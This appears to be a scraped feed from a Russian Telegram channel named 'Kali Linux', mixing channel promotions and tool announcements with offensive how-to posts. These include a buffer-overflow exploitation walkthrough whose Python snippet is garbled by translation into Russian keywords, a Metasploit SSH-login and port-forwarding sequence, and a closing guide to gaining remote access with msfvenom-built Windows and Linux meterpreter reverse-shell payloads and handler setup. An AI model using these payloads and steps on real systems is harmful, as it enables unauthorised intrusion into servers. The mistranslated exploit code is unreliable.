Kali Linux
53.3K subscribers
1.04K photos
74 videos
13 files
1.08K links
@linux_kal наш чат

По всем вопросам- @workakkk

@ai_machinelearning_big_data - машинное обучение

@itchannels_telegram - 🔥 главные ресурсы для хакера

@programming_books_it - бесплатные it книги

@pythonl -🐍

РКН: clck.ru/3Fmszy
Download Telegram
Утилиты командной строки: Linux

Утилиты операционной системы, сортированный список в алфавитном порядке GNU/Linux. Удобный поиск по названию команды.

https://900913.ru/tldr/linux/

@linuxkalii
👍23🔥21
Ungoogled-Chromium — форк бесплатного браузера Chromium, ориентированный на защиту конфиденциальности

Браузер, без зависимости от веб-сервисов Google ориентированный в первую очередь на приватность пользователя и безопасность данных. Имеет большое количество настроек для повышения конфиденциальности, контроля и прозрачности.

🖥 GitHub

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍25🔥72
⌨️ Захват сетевого трафика в Kali Linux

Kali Linux уже давно является дистрибутивом Linux для профессионалов в области безопасности. Kali Linux имеет большую коллекцию ориентированных на безопасность инструментов для пентестеров, специалистов по цифровой криминалистике, реверс-инженеров и других специалистов, которые хотят выполнять задачи, связанные с безопасностью, в среде Linux.

В любое время, когда вы хотите выполнить тестирование безопасности, вы должны иметь возможность контролировать то, что вы делаете. Один из хороших способов сделать это — просмотреть сетевой трафик. У вас должна быть возможность перехватывать сетевые сообщения, чтобы вы могли анализировать происходящее и узнавать “the truth of communication”. Это может помочь вам решить множество проблем, с которыми вы можете столкнуться.

Читать

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍198🔥6
🖥 Вспомнить все: 6 уникальных, но подзабытых утилит Linux

Приготовьтесь к путешествию в “кроличью нору” бинарных файлов Linux. Мы заглянем в самые потаенные уголки /usr/bin и исследуем уникальные и интересные программы, смахнув с них пыль времен как с затерянных драгоценных камней.

На первый взгляд они могут показаться устаревшими, однако это не так. Они все еще представляют собой весьма полезный инструмент для программиста.

Откроем же для себя еще больше удивительных утилит, которые таит Linux.

Читать

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥14👍71🤔1
Forwarded from Golang
👣 goHackTools

В репозитории содержатся переписанные скрипты по хакингу на Go из следующих книг:

Violent Python
Black Hat Python
Security with Go
Python Web Penetration Testing Cookbook
asecuritysite
Криптография с Python
Black Hat Go

🖥 Github

@Golang_google
Please open Telegram to view this post
VIEW IN TELEGRAM
👍14🔥51👎1
Sitadel — функциональный сканер безопасности веб-приложений на Python.

Полезный и простой в использовании инструмент сталкера.

Возможности:
Собирает информацию о используемых фреймворках, cms, os, языках, серверах и др.вещи на сайте
Брутфорс
Поддерживает разные инъекции:
HTML Injection
SQL Injection
LDAP Injection
XPath Injection
Cross Site Scripting (XSS)
Remote File Inclusion (RFI)
PHP Code Injection

$ git clone https://github.com/shenril/Sitadel.git
$ cd Sitadel
$ pip3 install .
$ python sitadel.py --help

🖥 GitHub

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍25🔥52👎2😁1
🖥Задача linux, перенаправление

Дана команда: ls file1 file2. Файл file1 существует, файл file2 не существует.
Перенаправьте только стандартную ошибку в конвейер, одновременно, записывая номера строк и перенаправьте вывод в файл. Стандартный вывод должен отображаться на экране.

Решение

2> выделяет ошибки, >(...) передаёт их на обработку в другую программу, nl - нумерует строки, > error.txt - сохраняет их:

$ ls script.sh lost.txt deal missing.txt 2> >(nl > error.txt)
script.sh

deal:
deal_10 deal_11

$ cat error.txt
1 ls: cannot access 'lost.txt': No such file or directory
2 ls: cannot access 'missing.txt': No such file or directory

$


Пишите свое решение в комментариях👇


@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍135🔥2
🔥 Огромная, наглядная шпаргалка для Backend-разработки на русском языке

Весь материал разбит на темы и подтемы:
•Сеть и интернет
•Устройство ПК
•Основы Linux
•Базы данных
•Разработка API
•Безопасность
•Тестирование и многое другое

Структура материала состоит из трех частей:

📌 Визуальная часть - различные изображения/таблицы/шпаргалки для лучшего понимания (может отсутствовать). Все рисунки и таблицы сделаны с нуля, специально для этого репозитория.
📌 Краткое описание - очень краткая выжимка информации с перечнем основных терминов и понятий. На термины навешиваются гиперссылки ведущие на соответсвующий раздел в Википедии или подобном справочном ресурсе.
📌 Ссылки на источники - ресурсы, где можно найти полную информацию по конкретному вопросу. По возможности, указываются максимально авторитетные источники, либо же те, которые предоставляют информацию максимально простым и понятным языком.

Лойс 👍

#doc #cheatsheet #russian

@linuxkalii
👍326🔥4👏1
Soinjector – инжектор общих обьектов для линукса, написанный на чистом С.

Может быть полезен когда нужно изменить поведение программы или для того, чтобы добавить программе новый функционал без необходимости перекомпиляции исходного кода

sudo ./injector <lib_path> <pid>

🖥 Github
📄 Документация

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍11🔥31
🔑 Rosenpass

Протокол обмена ключами, использующий методы, защищенные от атак квантовых компьютеров

Превращает ваш VPN в защищенный протокол от атак квантовых компьютеров

🖥 Github

#Security #Useful #Privacy #VPN

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍10🔥42👎2
👣 Zmap-ProxyScanner - быстрый способ поиска прокси. Поможет найти 2000-5000 рабочих http, socks4, socks5 прокси за одно сканирование.

⚙️ GitHub

#github #soft #Go

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍304🔥4🤩4
💣Коротко о перезаписи буфера💣

Рассмотрим как делается перезапись буфера. Давайте приступим к практике.

#Immunity debugger
Для того чтобы грамотно выполнить данную атаку нам понадобится Immunity debugger. Это программное обеспечение для работы с обратной инженерией. В нем мы должны запустить приложение с exe форматом, которое обращается к серверу. И если оно написано не очень грамотно у нас будет возможность перезаписать буфер и в результате получить обратное подключение к серверу.

#fuzzing
Первое что мы должны сделать - это использовать фаззинг приложения, чтобы узнать через сколько отправленных байтов оно "Крашнется". Это делается с помощью скрипта на python.

Наша цель тут найти точное значение, поэтому одним скриптом тут не обойдешься, и нам нужно прибавить к нашему результату из скрипта 400 дополнительных байт и отправить их с помощью другого скрипта, в качестве полезной нагрузки.

#эксплуатация
После того, как мы нашли offset и нашли смещение, вам нужно добавить определенную строку в качестве полезной нагрузки в заданный exploit.py . Эта конкретная строка строится с помощью трех простых строк python:

для x в диапазоне (1, 256):
печать ("\x" + "{:02x}".формат (x), конец=")
печать()

Который приведет к следующему:
\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74... (и тд)

это просто байт-код в порядке возрастания. Таким образом, \x01 - это 01, а \x02 - 02 и т. Д.
Если у вас есть набор смещения, заполнения (BBBB) и полезной нагрузки, вы можете запустить exploit.py против приложения, которое должно аварийно завершить работу с EIP, установленным на 42424242. Щелкните правой кнопкой мыши на ESP и нажмите "следовать в дампе", который должен перейти по адресу ESP. Вы можете немного прокрутить вверх, чтобы проверить, расположены ли ваши AAA и BBBB.

Пример: 🗯У вас строки могут быть другие, это просто наглядный пример чтобы вы поняли🗯

#плохие персонажи
Теперь начинается самая простая часть, просто начните со строки 018DFA30 и считайте вверх для шестнадцатеричных значений. Первый плохой символ - 07, потому что там должно быть 07, но там написано 0A.

Таким образом, это означает, что программа неправильно обрабатывает входные данные. Удалите \x07 из полезной нагрузки, перезапустите приложение и снова запустите эксплойт. Повторяйте до последнего символа вашей конкретной строки (FF соответственно \XFF).

@linuxkalii
👍152🔥2
⭐️ Free-proxy

Free proxy scraper written in python.

Бесплатный прокси-скрапер, написанный на python.

pip install free-proxy

🖥 Github

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9👍32🥰2👎1
👁‍🗨Port forwarding👁‍🗨

Переадресация портов устанавливает безопасное соединение между удаленным пользователем и локальными машинами. В организациях можно указать номера портов источника и назначения, чтобы использовать туннелирование с помощью Linux. Наряду с этим они также должны указать пункт назначения, который может быть IP-адресом или именем хоста.

Давайте включим машину Kali Linux и проверим, размещена ли веб-страница на нашем local host'е. Итак, давайте посмотрим, как локальный адрес и порт могут быть перенаправлены на удаленный хост. Этого можно добиться разными способами, поэтому давайте рассмотрим их по очереди.

use auxiliary/scanner/ssh/ssh_login
set rhosts (ip удаленной машины)
set username (логин)
set password (пароль)
exploit
sessions -u 1
sessions 2
netstat -antp
portfwd добавить -l 8081 -p 8080 -r 127.0.0.1

@linuxkalii
👍10🔥32👎1👏1
🔥 Top it channels

⭐️ Нейронные сети
@data_analysis_ml - data science
@vistehno - chatgpt ведет блог, решает любые задачи и отвечает на любые ваши вопросы.
@aigen - сети для генерации картинок. видео, музыки и многого другого.
@neural – погружение в нейросети.

🖥 SQL базы данных

@sqllib - библиотека баз данных
@sqlhub - повышение эффективности кода с грамотным использованием бд.
@chat_sql - чат изучения бд.

🖥 Machine learning
@ai_ml – погружение в нейросети, ai, Chatgpt, midjourney, машинное обучение.
@machinelearning_ru – машинное обучении на русском от новичка до профессионала.
@machinelearning_interview – подготовка к собеседованию.
@datascienceiot – бесплатные книги Machine learning
@ArtificialIntelligencedl – канал о искусственном интеллекте

@machinee_learning – чат о машинном обучении
@datascienceml_jobs - работа ds, ml
@Machinelearning_Jobs - чат работы мл

🖥 Python

@pythonl - главный канал самого популярного языка программирования.
@pro_python_code – учим python с ментором.
@python_job_interview – подготовка к Python собеседованию.
@python_testit - проверочные тесты на python
@pythonlbooks - современные книги Python
@python_djangojobs - работа для Python программистов
@python_django_work - чат обсуждения вакансий


🖥 Javascript / front

@react_tg - - 40,14% разработчиков сайтов использовали React в 2022 году - это самая популярная библиотека для создания сайтов.
@javascript -канал для JS и FrontEnd разработчиков. Лучшие практики и примеры кода. Туториалы и фишки JS
@Js Tests - каверзные тесты JS
@hashdev - погружение в web разработку.
@javascriptjobjs - отборные вакансии и работа FrontEnd.
@jsspeak - чат поиска FrontEnd работы.

🖥 Java
@javatg - выучить Java с senior разработчиком по профессиональной методике.
@javachats - чат для ответов на вопросы по Java
@java_library - библиотека книг Java
@android_its - Android разработка
@java_quizes - тесты Java
@Java_workit - работа Java
@progersit - шпаргалки ит

👣 Golang
@Golang_google - восхитительный язык от Google, мощный и перспективный.
@golang_interview - вопросы и ответы с собеседований по Go. Для всех уровней разработчиков.
@golangtests - интересные тесты и задачи GO
@golangl - чат изучающих Go
@GolangJobsit - отборные вакансии и работа GO
@golang_jobsgo - чат для ищущих работу.
@golang_books - полезные книги Golang
@golang_speak - обсуждение языка Go

🖥 Linux
@linux -топ фишки, гайды, уроки по работе  с Linux.
@linux chat - чат linux для обучения и помощи.
@linux_read - бесплатные книги linux

👷‍♂️ IT работа

@hr_itwork -кураторский список актуальных ит-ваканнсии

🤡It memes
@memes_prog - ит-мемы

⚙️ Rust
@rust_code - Rust избавлен от болевых точек, которые есть во многих современных яп
@rust_chats - чат rust

#️⃣ c# c++
C# - объединяет лучшие идеи современных языков программирования
@csharp_cplus чат
С++ - Универсальность. Возможно, этот главный плюс C++.

📓 Книги

@programming_books_it - большая библиотека. программиста
@datascienceiot -ds книги
@pythonlbooks - python библиотека.
@golang_books - книги Golang
@frontendbooksit - front книги
@progersit - ит-шпаргалки
@linux_read - Linux books
@java_library - Java books

🖥 Github
@github_code - лучшие проекты с github
@bigdatai - инструменты по работе с данными

🖥 Devops
Devops - специалист общего профиля, которому нужны обширные знания в области разработки.

📢 English for coders

@english_forprogrammers - Английский для программистов
Please open Telegram to view this post
VIEW IN TELEGRAM
👍53
Как получить удаленный доступ к компьютеру или серверу если у вас есть такая возможность.

Для этой цели мы будем использовать Metasploit.

В этот раз, мы не будем говорить о случае, когда у сайта на серваке стоит программное обеспечение старой версии. Разберем вариант, когда вам удалось загрузить туда reverse shelll или же попросту обратную оболочку.

На этом этапе, найдутся знающие люди которые спросят меня, мол зачем тут Metasploit. Ведь мы можем просто открыть нужный порт прописав что-то вроде: nc -lvp ваш порт.

Вот причины по которым выгодно делать это через Metasploit.
1)Обратная оболочка в Metasploit более надежная. И не так быстро разрывается если что-то случится.
2) Вы можете заспавнить оболочку в meterpreter просто написав shell.
3)Вы можете иметь неограниченное количество сессий и свободно переключаться между ними.

Итак перейдем в делу. Есть несколько вариантов использования Metasploit.

Если атакуемый сервер это Windows - то вот ваша полезная нагрузка:
🗨 msfvenom -p windows/x64/meterpreterreversetcp lhost=Ваш ip lport=Ваш порт -f aspx -o shell.aspx

При этом название используемого эксплойта будет:🗨 use exploit/multi/handler

* Using configured payload generic/shellreversetcp
msf5 exploit(multi/handler) >
🗨 set payload windows/x64/meterpreterreversetcp

Если аттакуемый сервер это Linux - то ваша полезная нагрузка:
🗨 msfvenom -p linux/x86/meterpreter/reversetcp LHOST=[Ваш ip] LPORT=[Ваш порт] -f elf > shell.elf
Это payload внутри опций в настройках.
🗨set payload linux/x86/meterpreter/reversetcp

@linuxkalii
👍12🔥43